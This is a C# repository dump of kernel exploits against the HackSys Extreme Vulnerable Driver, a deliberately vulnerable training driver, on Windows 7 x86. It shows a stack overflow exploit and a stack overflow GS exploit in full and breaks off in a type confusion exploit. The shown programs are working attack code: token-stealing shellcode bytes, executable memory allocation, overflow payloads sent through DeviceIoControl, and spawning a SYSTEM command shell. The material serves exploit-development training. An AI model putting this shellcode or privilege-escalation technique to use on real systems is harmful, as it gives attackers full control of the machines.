98 |
99 | [DllImport("kernel32.dll", SetLastError = true)]
100 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
101 |
102 | // Global variable
103 | static IntPtr hDevice = IntPtr.Zero;
104 |
105 | // Helper functions
106 | static void CleanUp()
107 | {
108 | Console.WriteLine("[>] Cleaning up handle object(s)");
109 | if (hDevice != IntPtr.Zero)
110 | {
111 | if (CloseHandle(hDevice))
112 | {
113 | hDevice = IntPtr.Zero;
114 | }
115 | else
116 | {
117 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
118 | }
119 | }
120 | }
121 |
122 | static bool IsWin7x86()
123 | {
124 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
125 | int MajorVersion = 0;
126 | int MinorVersion = 0;
127 | int BuildNumber = 0;
128 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
129 | BuildNumber &= 0xFFFF;
130 |
131 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
132 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
133 | {
134 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
135 | return true;
136 | }
137 | else
138 | {
139 | Console.WriteLine("[-] Unsupported OS is detected");
140 | return false;
141 | }
142 | }
143 |
144 | static bool IsSystem()
145 | {
146 | string user = Environment.UserName;
147 |
148 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
149 | {
150 | return true;
151 | }
152 | else
153 | {
154 | return false;
155 | }
156 | }
157 |
158 | static bool SpawnShell()
159 | {
160 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
161 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
162 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
163 | uint CREATE_NEW_CONSOLE = 0x00000010;
164 | string CurrentDirectory = "C:\\Windows\\System32";
165 | STARTUPINFO si = new STARTUPINFO();
166 | pSec.nLength = Marshal.SizeOf(pSec);
167 | tSec.nLength = Marshal.SizeOf(tSec);
168 |
169 | bool status = CreateProcess(
170 | ApplicationName, null, ref pSec, ref tSec, false,
171 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
172 | ref si, out PROCESS_INFORMATION pi);
173 |
174 | if (status)
175 | {
176 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
177 | WaitForSingleObject(pi.hProcess, 500);
178 | CloseHandle(pi.hProcess);
179 | CloseHandle(pi.hThread);
180 | }
181 | else
182 | {
183 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
184 | }
185 |
186 | return status;
187 | }
188 |
189 | static void Main()
190 | {
191 | byte[] shellcode = {
192 | //--[Setup]
193 | 0x60, // pushad
194 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
195 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
196 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
197 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
198 | //--[Copy System PID token]
199 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
200 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
201 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
202 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
203 | 0x75, 0xED, // jnz ->|
204 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
205 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
206 | //--[Recover]
207 | 0x61, // popad
208 | 0x5D, // pop ebp
209 | 0xC2, 0x08, 0x00 // ret 8
210 | };
211 |
212 | Console.WriteLine("--[ HEVD Exploitation : Stack Overflow\n");
213 |
214 | if (!IsWin7x86())
215 | {
216 | return;
217 | }
218 |
219 | // Step 1: Allocate Token Stealing Shellcode
220 | IntPtr ShellcodeBuffer;
221 | uint dwSize = 0x1000;
222 | uint MEM_COMMIT = 0x00001000;
223 | uint MEM_RESERVE = 0x00002000;
224 | uint PAGE_EXECUTE_READWRITE = 0x40;
225 |
226 | Console.WriteLine("[>] Trying to allocate shellcode");
227 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
228 |
229 | if (ShellcodeBuffer == IntPtr.Zero)
230 | {
231 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
232 | return;
233 | }
234 |
235 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
236 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
237 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
238 |
239 | // Step 2: Prepare payload for overwriting kernel pointer
240 | byte[] offset = Encoding.ASCII.GetBytes(new string('A', 0x820));
241 | byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
242 | byte[] payload = new byte[offset.Length + pointer.Length];
243 | offset.CopyTo(payload, 0);
244 | pointer.CopyTo(payload, offset.Length);
245 |
246 | // Step 3: Open driver's handle
247 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
248 | uint GENERIC_READ = 0x80000000;
249 | uint GENERIC_WRITE = 0x40000000;
250 | uint FILE_SHARE_READ = 0x00000001;
251 | uint FILE_SHARE_WRITE = 0x00000002;
252 | uint OPEN_EXISTING = 0x3;
253 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
254 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
255 | IntPtr invalid = new IntPtr(-1);
256 |
257 | Console.WriteLine("[>] Opening {0}", deviceName);
258 | hDevice = CreateFile(
259 | deviceName, GENERIC_READ | GENERIC_WRITE,
260 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
261 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
262 |
263 | if (hDevice == invalid)
264 | {
265 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
266 | return;
267 | }
268 |
269 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
270 |
271 | // Step 4: Trigger stack overflow
272 | uint ioctl = 0x222003;
273 | int BytesReturned = 0;
274 |
275 | Console.WriteLine("[>] Triggering stack overflow");
276 | bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
277 |
278 | if (!status)
279 | {
280 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
281 | CleanUp();
282 | return;
283 | }
284 | CleanUp();
285 |
286 | // Step 5: Spawn SYSTEM shell
287 | if (IsSystem() && SpawnShell())
288 | {
289 | Console.WriteLine("[+] Exploit is completed successfully");
290 | }
291 | else
292 | {
293 | Console.WriteLine("[-] Failed to exploit");
294 | }
295 | }
296 | }
297 | }
298 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("StackOverflow")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("StackOverflow")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("f11dcd73-3213-4687-add0-198d6bfc225f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflow/StackOverflow.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}
8 | Exe
9 | StackOverflow
10 | StackOverflow
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 | true
25 |
26 |
27 | ..\bin\x86\Release\
28 | TRACE
29 | true
30 | pdbonly
31 | x86
32 | prompt
33 | MinimumRecommendedRules.ruleset
34 | true
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace StackOverflowGS
6 | {
7 | class Program
8 | {
9 | [StructLayout(LayoutKind.Sequential)]
10 | struct SECURITY_ATTRIBUTES
11 | {
12 | public int nLength;
13 | public IntPtr lpSecurityDescriptor;
14 | public int bInheritHandle;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
18 | struct STARTUPINFO
19 | {
20 | public int cb;
21 | public string lpReserved;
22 | public string lpDesktop;
23 | public string lpTitle;
24 | public int dwX;
25 | public int dwY;
26 | public int dwXSize;
27 | public int dwYSize;
28 | public int dwXCountChars;
29 | public int dwYCountChars;
30 | public int dwFillAttribute;
31 | public int dwFlags;
32 | public short wShowWindow;
33 | public short cbReserved2;
34 | public IntPtr lpReserved2;
35 | public IntPtr hStdInput;
36 | public IntPtr hStdOutput;
37 | public IntPtr hStdError;
38 | }
39 |
40 | [StructLayout(LayoutKind.Sequential)]
41 | struct PROCESS_INFORMATION
42 | {
43 | public IntPtr hProcess;
44 | public IntPtr hThread;
45 | public int dwProcessId;
46 | public int dwThreadId;
47 | }
48 |
49 | [DllImport("ntdll.dll")]
50 | static extern void RtlGetNtVersionNumbers(
51 | ref int MajorVersion,
52 | ref int MinorVersion,
53 | ref int BuildNumber);
54 |
55 | [DllImport("kernel32.dll", SetLastError = true)]
56 | static extern IntPtr VirtualAlloc(
57 | IntPtr lpAddress,
58 | uint dwSize,
59 | uint flAllocationType,
60 | uint flProtect);
61 |
62 | [DllImport("kernel32.dll", SetLastError = true)]
63 | static extern bool VirtualFree(
64 | IntPtr lpAddress,
65 | uint dwSize,
66 | uint dwFreeType);
67 |
68 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
69 | static extern IntPtr CreateFile(
70 | string lpFileName,
71 | uint dwDesiredAccess,
72 | uint dwShareMode,
73 | IntPtr lpSecurityAttributes,
74 | uint dwCreationDisposition,
75 | uint dwFlagsAndAttributes,
76 | IntPtr hTemplateFile);
77 |
78 | [DllImport("kernel32.dll", SetLastError = true)]
79 | static extern bool DeviceIoControl(
80 | IntPtr hDevice,
81 | uint dwIoControlCode,
82 | IntPtr InBuffer,
83 | int nInBufferSize,
84 | IntPtr OutBuffer,
85 | int nOutBufferSize,
86 | ref int pBytesReturned,
87 | IntPtr lpOverlapped);
88 |
89 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
90 | static extern bool CreateProcess(
91 | string lpApplicationName,
92 | string lpCommandLine,
93 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
94 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
95 | bool bInheritHandles,
96 | uint dwCreationFlags,
97 | IntPtr lpEnvironment,
98 | string lpCurrentDirectory,
99 | ref STARTUPINFO lpStartupInfo,
100 | out PROCESS_INFORMATION lpProcessInformation);
101 |
102 | [DllImport("kernel32.dll", SetLastError = true)]
103 | static extern bool CloseHandle(IntPtr hObject);
104 |
105 | [DllImport("kernel32.dll", SetLastError = true)]
106 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
107 |
108 | // Global variables
109 | static IntPtr hDevice = IntPtr.Zero;
110 |
111 | // Helper functions
112 | static void CleanUp()
113 | {
114 | Console.WriteLine("[>] Cleaning up handle object(s)");
115 | if (hDevice != IntPtr.Zero)
116 | {
117 | if (CloseHandle(hDevice))
118 | {
119 | hDevice = IntPtr.Zero;
120 | }
121 | else
122 | {
123 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
124 | }
125 | }
126 | }
127 |
128 | static bool IsWin7x86()
129 | {
130 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
131 | int MajorVersion = 0;
132 | int MinorVersion = 0;
133 | int BuildNumber = 0;
134 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
135 | BuildNumber &= 0xFFFF;
136 |
137 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
138 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
139 | {
140 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
141 | return true;
142 | }
143 | else
144 | {
145 | Console.WriteLine("[-] Unsupported OS is detected");
146 | return false;
147 | }
148 | }
149 |
150 | static bool IsSystem()
151 | {
152 | string user = Environment.UserName;
153 |
154 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
155 | {
156 | return true;
157 | }
158 | else
159 | {
160 | return false;
161 | }
162 | }
163 |
164 | static bool SpawnShell()
165 | {
166 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
167 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
168 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
169 | uint CREATE_NEW_CONSOLE = 0x00000010;
170 | string CurrentDirectory = "C:\\Windows\\System32";
171 | STARTUPINFO si = new STARTUPINFO();
172 | pSec.nLength = Marshal.SizeOf(pSec);
173 | tSec.nLength = Marshal.SizeOf(tSec);
174 |
175 | bool status = CreateProcess(
176 | ApplicationName, null, ref pSec, ref tSec, false,
177 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
178 | ref si, out PROCESS_INFORMATION pi);
179 |
180 | if (status)
181 | {
182 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
183 | WaitForSingleObject(pi.hProcess, 500);
184 | CloseHandle(pi.hProcess);
185 | CloseHandle(pi.hThread);
186 | }
187 | else
188 | {
189 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
190 | }
191 |
192 | return status;
193 | }
194 |
195 | // Main function
196 | static void Main()
197 | {
198 | byte[] shellcode = {
199 | //--[Setup]
200 | 0x60, // pushad
201 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
202 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
203 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
204 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
205 | //--[Copy System PID token]
206 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
207 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
208 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
209 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
210 | 0x75, 0xED, // jnz ->|
211 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
212 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
213 | //--[Recover]
214 | 0x61, // popad
215 | 0x81, 0xC4, 0x8C, 0x07, 0x00, 0x00, // add esp,0x78c ; Offset of IRP on stack
216 | 0x8B, 0x3C, 0x24, // mov edi,DWORD PTR [esp] ; Restore the pointer to IRP
217 | 0x83, 0xC4, 0x08, // add esp,0x8 ; Offset of DbgPrint string
218 | 0x8B, 0x1C, 0x24, // mov ebx,DWORD PTR [esp] ; Restore the DbgPrint string
219 | 0x81, 0xC4, 0x34, 0x02, 0x00, 0x00, // add esp,0x234 ; Target frame to return
220 | 0x31, 0xC0, // xor eax, eax ; NTSTATUS -> STATUS_SUCCESS
221 | 0x5D, // pop ebp ; Restore saved EBP
222 | 0xC2, 0x08, 0x00 // ret 8 ; Return cleanly
223 | };
224 |
225 | Console.WriteLine("--[ HEVD Exploitation : Stack Overflow GS\n");
226 |
227 | if (!IsWin7x86())
228 | {
229 | return;
230 | }
231 |
232 | // Step 1: Allocate memory for shellcode
233 | IntPtr ShellcodeBuffer;
234 | uint dwSize = 0x2000;
235 | uint MEM_COMMIT = 0x00001000;
236 | uint MEM_RESERVE = 0x00002000;
237 | uint PAGE_EXECUTE_READWRITE = 0x40;
238 |
239 | Console.WriteLine("[>] Trying to allocate shellcode.");
240 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
241 |
242 | if (ShellcodeBuffer == IntPtr.Zero)
243 | {
244 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
245 | return;
246 | }
247 |
248 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}.", dwSize, ShellcodeBuffer.ToString("X8"));
249 |
250 | // Step 2: Free memory to trigger memory access exception with memcpy
251 | IntPtr FreeBuffer = new IntPtr(ShellcodeBuffer.ToInt32() + 0x1000);
252 | dwSize = 0x1000;
253 | uint MEM_DECOMMIT = 0x00004000;
254 |
255 | Console.WriteLine("[>] Trying to free memory page from 0x{0}.", FreeBuffer.ToString("X8"));
256 | bool status = VirtualFree(FreeBuffer, dwSize, MEM_DECOMMIT);
257 |
258 | if (!status)
259 | {
260 | Console.WriteLine("[-] Failed to VirtualFree (code={0})", Marshal.GetLastWin32Error());
261 | return;
262 | }
263 |
264 | Console.WriteLine("[+] VirtualFree is successful.");
265 |
266 | // Step 3: Set shellcode and payload
267 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
268 |
269 | byte[] padding = Encoding.ASCII.GetBytes(new String('A', 0x210));
270 | byte[] callback = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
271 | byte[] payload = new byte[padding.Length + callback.Length];
272 | padding.CopyTo(payload, 0);
273 | callback.CopyTo(payload, padding.Length);
274 |
275 | IntPtr PayloadPointer = new IntPtr(FreeBuffer.ToInt32() - payload.Length);
276 | Marshal.Copy(payload, 0, PayloadPointer, payload.Length);
277 |
278 | // Step 4: Open driver's handle
279 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
280 | uint GENERIC_READ = 0x80000000;
281 | uint GENERIC_WRITE = 0x40000000;
282 | uint FILE_SHARE_READ = 0x00000001;
283 | uint FILE_SHARE_WRITE = 0x00000002;
284 | uint OPEN_EXISTING = 0x3;
285 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
286 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
287 | IntPtr invalid = new IntPtr(-1);
288 |
289 | Console.WriteLine("[>] Opening {0}", deviceName);
290 | hDevice = CreateFile(
291 | deviceName, GENERIC_READ | GENERIC_WRITE,
292 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
293 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
294 |
295 | if (hDevice == invalid)
296 | {
297 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
298 | return;
299 | }
300 |
301 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
302 |
303 | // Step 5: Trigger stack overflow and memory access exception
304 | uint ioctl = 0x222007;
305 | int BytesReturned = 0;
306 |
307 | Console.WriteLine("[>] Triggering stack overflow and memory access exception.");
308 | status = DeviceIoControl(hDevice, ioctl, PayloadPointer, payload.Length + 0x4, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
309 |
310 | if (!status)
311 | {
312 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
313 | CleanUp();
314 | return;
315 | }
316 | CleanUp();
317 |
318 | // Step 6: Spawn SYSTEM shell
319 | if (IsSystem() && SpawnShell())
320 | {
321 | Console.WriteLine("[+] Exploit is completed successfully");
322 | }
323 | else
324 | {
325 | Console.WriteLine("[-] Failed to exploit.");
326 | }
327 | }
328 | }
329 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("StackOverflowGS")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("StackOverflowGS")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("47ed8c95-0e1b-43de-9ec4-12505c263168")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/StackOverflowGS/StackOverflowGS.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}
8 | Exe
9 | StackOverflowGS
10 | StackOverflowGS
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace TypeConfusion
5 | {
6 | class Program
7 | {
8 | [StructLayout(LayoutKind.Sequential)]
9 | struct SECURITY_ATTRIBUTES
10 | {
11 | public int nLength;
12 | public IntPtr lpSecurityDescriptor;
13 | public int bInheritHandle;
14 | }
15 |
16 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
17 | struct STARTUPINFO
18 | {
19 | public int cb;
20 | public string lpReserved;
21 | public string lpDesktop;
22 | public string lpTitle;
23 | public int dwX;
24 | public int dwY;
25 | public int dwXSize;
26 | public int dwYSize;
27 | public int dwXCountChars;
28 | public int dwYCountChars;
29 | public int dwFillAttribute;
30 | public int dwFlags;
31 | public short wShowWindow;
32 | public short cbReserved2;
33 | public IntPtr lpReserved2;
34 | public IntPtr hStdInput;
35 | public IntPtr hStdOutput;
36 | public IntPtr hStdError;
37 | }
38 |
39 | [StructLayout(LayoutKind.Sequential)]
40 | struct PROCESS_INFORMATION
41 | {
42 | public IntPtr hProcess;
43 | public IntPtr hThread;
44 | public int dwProcessId;
45 | public int dwThreadId;
46 | }
47 |
48 | [DllImport("ntdll.dll")]
49 | static extern void RtlGetNtVersionNumbers(
50 | ref int MajorVersion,
51 | ref int MinorVersion,
52 | ref int BuildNumber);
53 |
54 | [DllImport("kernel32.dll", SetLastError = true)]
55 | static extern IntPtr VirtualAlloc(
56 | IntPtr lpAddress,
57 | uint dwSize,
58 | uint flAllocationType,
59 | uint flProtect);
60 |
61 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
62 | static extern IntPtr CreateFile(
63 | string lpFileName,
64 | uint dwDesiredAccess,
65 | uint dwShareMode,
66 | IntPtr lpSecurityAttributes,
67 | uint dwCreationDisposition,
68 | uint dwFlagsAndAttributes,
69 | IntPtr hTemplateFile);
70 |
71 | [DllImport("kernel32.dll", SetLastError = true)]
72 | static extern bool DeviceIoControl(
73 | IntPtr hDevice,
74 | uint dwIoControlCode,
75 | byte[] InBuffer,
76 | int nInBufferSize,
77 | IntPtr OutBuffer,
78 | int nOutBufferSize,
79 | ref int pBytesReturned,
80 | IntPtr lpOverlapped);
81 |
82 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
83 | static extern bool CreateProcess(
84 | string lpApplicationName,
85 | string lpCommandLine,
86 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
87 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
88 | bool bInheritHandles,
89 | uint dwCreationFlags,
90 | IntPtr lpEnvironment,
91 | string lpCurrentDirectory,
92 | ref STARTUPINFO lpStartupInfo,
93 | out PROCESS_INFORMATION lpProcessInformation);
94 |
95 | [DllImport("kernel32.dll", SetLastError = true)]
96 | static extern bool CloseHandle(IntPtr hObject);
97 |
98 | [DllImport("kernel32.dll", SetLastError = true)]
99 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
100 |
101 | // Global variables
102 | static IntPtr hDevice = IntPtr.Zero;
103 |
104 | // Helper functions
105 | static void CleanUp()
106 | {
107 | Console.WriteLine("[>] Cleaning up handle object(s)");
108 | if (hDevice != IntPtr.Zero)
109 | {
110 | if (CloseHandle(hDevice))
111 | {
112 | hDevice = IntPtr.Zero;
113 | }
114 | else
115 | {
116 | Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
117 | }
118 | }
119 | }
120 |
121 | static bool IsWin7x86()
122 | {
123 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
124 | int MajorVersion = 0;
125 | int MinorVersion = 0;
126 | int BuildNumber = 0;
127 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
128 | BuildNumber &= 0xFFFF;
129 |
130 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
131 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
132 | {
133 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
134 | return true;
135 | }
136 | else
137 | {
138 | Console.WriteLine("[-] Unsupported OS is detected");
139 | return false;
140 | }
141 | }
142 |
143 | static bool IsSystem()
144 | {
145 | string user = Environment.UserName;
146 |
147 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
148 | {
149 | return true;
150 | }
151 | else
152 | {
153 | return false;
154 | }
155 | }
156 |
157 | static bool SpawnShell()
158 | {
159 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
160 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
161 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
162 | uint CREATE_NEW_CONSOLE = 0x00000010;
163 | string CurrentDirectory = "C:\\Windows\\System32";
164 | STARTUPINFO si = new STARTUPINFO();
165 | pSec.nLength = Marshal.SizeOf(pSec);
166 | tSec.nLength = Marshal.SizeOf(tSec);
167 |
168 | bool status = CreateProcess(
169 | ApplicationName, null, ref pSec, ref tSec, false,
170 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
